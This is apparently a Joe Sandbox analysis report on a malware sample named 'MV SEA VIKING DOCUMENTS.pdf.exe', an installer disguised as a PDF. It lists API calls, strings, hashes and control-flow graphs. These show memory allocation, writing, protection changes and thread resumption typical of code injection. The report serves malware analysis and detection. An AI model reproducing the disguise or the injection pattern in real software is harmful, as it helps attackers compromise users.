                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )IpI$dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-3008493083
                                                                                                                                                                                                                                • Opcode ID: 064b195e7c7b1ddeef5aed929db5f5973d476377a5f91596af3a2f1d6db5121b
                                                                                                                                                                                                                                • Instruction ID: 4c12b76d99bfeecdb9e48307803f1cb3feecd0b01b0cb6c2f189700dd2be9ee8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064b195e7c7b1ddeef5aed929db5f5973d476377a5f91596af3a2f1d6db5121b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F382217160435ADFDF349E38C9947EA7BA2BF55350F45822EDCCA8B255D3308A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1047 2452fc1-2452fee 1048 2451a45-2451a46 1047->1048 1049 2452ff4-24530ed 1047->1049 1052 24530f3-2453165 call 24610e5 1049->1052 1053 24592ef-2459314 1049->1053 1060 245343b-245344c 1052->1060 1061 245316b-24531db 1052->1061 1055 245dbb3-245dc60 1053->1055 1056 245931a-245986b call 245fc11 call 245db94 call 24610e5 1053->1056 1062 245dc66-245dd17 call 245dc88 call 245e40e call 245dd2d 1055->1062 1063 245dd19-245dd29 LoadLibraryA call 245dd2d 1055->1063 1120 245a816-245a93b call 24610e5 * 3 1056->1120 1121 2459871-245995c call 245dbb3 call 24610e5 call 245a941 1056->1121 1060->1053 1070 24531dd-24532e3 call 24531fa call 245ded8 1061->1070 1062->1063 1091 24532e5-2453320 1070->1091 1092 245333e-2453346 1070->1092 1095 245f4c2-245f4cf call 245f4c9 1091->1095 1099 2453326-245332b 1091->1099 1092->1095 1096 245334c-2453351 1092->1096 1110 245f4d2-245f549 1095->1110 1096->1095 1100 2453357-245335c 1096->1100 1099->1095 1103 2453331-2453336 1099->1103 1100->1095 1104 2453362-2453367 1100->1104 1103->1095 1107 245333c 1103->1107 1104->1095 1108 245336d-2453401 call 24533de 1104->1108 1107->1092 1108->1070 1123 2453407-245341c 1108->1123 1118 245f54b-245f7af call 245f5cb 1110->1118 1120->1055 1144 24519e1-24519f3 call 245179b 1121->1144 1145 2459962-2459d00 call 245db0f call 24610e5 1121->1145 1152 245197d-245199c 1144->1152 1153 245d2ef-245d474 call 245db0f 1144->1153 1145->1120 1170 2459d06-2459e9a 1145->1170 1152->1144 1173 245d476-245d54d 1153->1173 1170->1055 1179 2459ea0-2459ee1 call 24610e5 1170->1179 1180 245d553-245d5a6 1173->1180 1179->1120 1185 2459ee7-245a188 call 24610e5 1179->1185 1180->1144 1184 245d5ac-245d651 1180->1184 1185->1120 1194 245a18e-245a1e8 1185->1194 1194->1053 1196 245a1ee-245a203 1194->1196 1196->1120 
1197 245a209-245a23a 1196->1197 1198 245a23c-245a299 1197->1198 1199 245a29f-245a2b1 1197->1199 1198->1120 1198->1199 1199->1053 1201 245a2b7-245a2c4 1199->1201 1201->1120 1202 245a2ca-245a43a 1201->1202 1202->1055 1205 245a440-245a4ba call 245e122 1202->1205 1205->1120 1209 245a4c0-245a597 call 2461835 NtWriteVirtualMemory 1205->1209 1209->1120 1213 245a59d-245a6a5 call 24610e5 1209->1213 1213->1120 1218 245a6ab-245a74f call 24610e5 1213->1218 1218->1120 1222 245a755-245a815 call 24610e5 1218->1222
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: `wI$dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-1454560376
                                                                                                                                                                                                                                • Opcode ID: 40c377021ed586e05acd33ba2c4dadd97a09590d0a31a3ae155eb50fe426c926
                                                                                                                                                                                                                                • Instruction ID: a8f48631e772d0a8e39e62b83a81cfabfbd5c25788b0299743a48477705f0f4e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c377021ed586e05acd33ba2c4dadd97a09590d0a31a3ae155eb50fe426c926
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C992207160435ADFDB349E38C9A87EA77A2FF55390F45422EDCCA9B250D3344A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 1227 245b2a6-245b2b5 1228 245b561-245b5e5 1227->1228 1229 245b2bb-245b508 call 245dbb3 1227->1229 1233 2461835-2461839 1228->1233 1234 245b5eb-245b705 call 245db2d call 245b5ff 1228->1234 1246 2451a45-2451a46 1229->1246 1247 245b50e-245b55e NtAllocateVirtualMemory 1229->1247 1236 246183a-24618a0 1233->1236 1250 245b706-245b70d 1234->1250 1242 24618a2-24618a4 1236->1242 1247->1228 1250->1250 1251 245b70f-245b71c 1250->1251 1252 245b77d-245b782 1251->1252 1253 245b71e-245b759 1251->1253 1254 245b783-245b7c2 1252->1254 1253->1254 1254->1233
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0245DBB3: LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(-0000000173D1F5F2,?,-6BB0B5A4), ref: 0245B53B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                                                                                                                • String ID: #4o$M{O$d5z7
                                                                                                                                                                                                                                • API String ID: 2616484454-573927798
                                                                                                                                                                                                                                • Opcode ID: 4e04c6bd9bfc3009842486ffa462f983423fe345d09862f95fae1223a5df4c0f
                                                                                                                                                                                                                                • Instruction ID: 9ecd2ff213f6e537153ea33d0220d663cbaf19affafaf0bc3b961c378b71fa14
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e04c6bd9bfc3009842486ffa462f983423fe345d09862f95fae1223a5df4c0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6715AB21407899BCB318E288C95BEF7AF29FD6748FA8415EDC899B216E3324543C711
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-751493344
                                                                                                                                                                                                                                • Opcode ID: bdc76c11376674ecedb6c183043de3d417186f32f339cdd5fde2d183bd1b7a0f
                                                                                                                                                                                                                                • Instruction ID: 802cd851ac90e5e5a4f978726038cb783b5cc857a1c64cd4454db5bdf451ffb9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bdc76c11376674ecedb6c183043de3d417186f32f339cdd5fde2d183bd1b7a0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF72FF7160435ADFDF349E38C9A87EA7BA2BF55350F45422EDCCA9B254D3304A86CB42
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F73420,004302B8,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00405F5D,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp, xrefs: 00406873
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp
                                                                                                                                                                                                                                • API String ID: 2295610775-4141617732
                                                                                                                                                                                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(B2B1C27B), ref: 0245DD19
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(2348C063,?,?,?,?,0245FD48,166B4E76,02459508), ref: 02460C29
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3389902171-0
                                                                                                                                                                                                                                • Opcode ID: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction ID: 64f1353298825d1c3084cb7c7b3f6f2bb54684f007a0cddc1e82b9077daba953
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B31F271A4024ADFDF30DE698D98BEE73EAAF94610F94412BDC49CB300D3309A42CB11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02452B6A), ref: 0245C54F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: d43e9524b3d960df7a749b66b5f8257a27218079c7472daf81f7afc5992c86e3
                                                                                                                                                                                                                                • Instruction ID: 72b71a6e6195d5243a40691f7b43405ccbc2cb44b038351c065dd3d2d3c81b5f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d43e9524b3d960df7a749b66b5f8257a27218079c7472daf81f7afc5992c86e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 860146D25C83C621860296B9580FF1BBEF94D83D4CB2846DEAC801B14BC61B2106E771
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtResumeThread.NTDLL(?,-5B147469,A3E57FEF), ref: 024612CC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2450000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                • Opcode ID: 188c4e9886e387249e5b1775f5302049ca11197d765e1bca873797d01bc7712b
                                                                                                                                                                                                                                • Instruction ID: 9a872ed80fe7e08ef5e3d57c893076ff24209e067a1032a0b8b80b596156fee4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 188c4e9886e387249e5b1775f5302049ca11197d765e1bca873797d01bc7712b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0017C30205245CFDB698E648A8C3F933A2AF99344F18422BCC0FDB714D73099C6CA03
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph (graph not reproduced; first node 403f9a-403fac)
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 121052019-0
                                                                                                                                                                                                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph (graph not reproduced; first node 403bec-403c04)
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F73420), ref: 00403CED
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                • API String ID: 1975747703-1862882193
                                                                                                                                                                                                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                                                                • API String ID: 2803837635-3988323475
                                                                                                                                                                                                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                                                                                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                                                                                                                                • API String ID: 551687249-3683892814
                                                                                                                                                                                                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
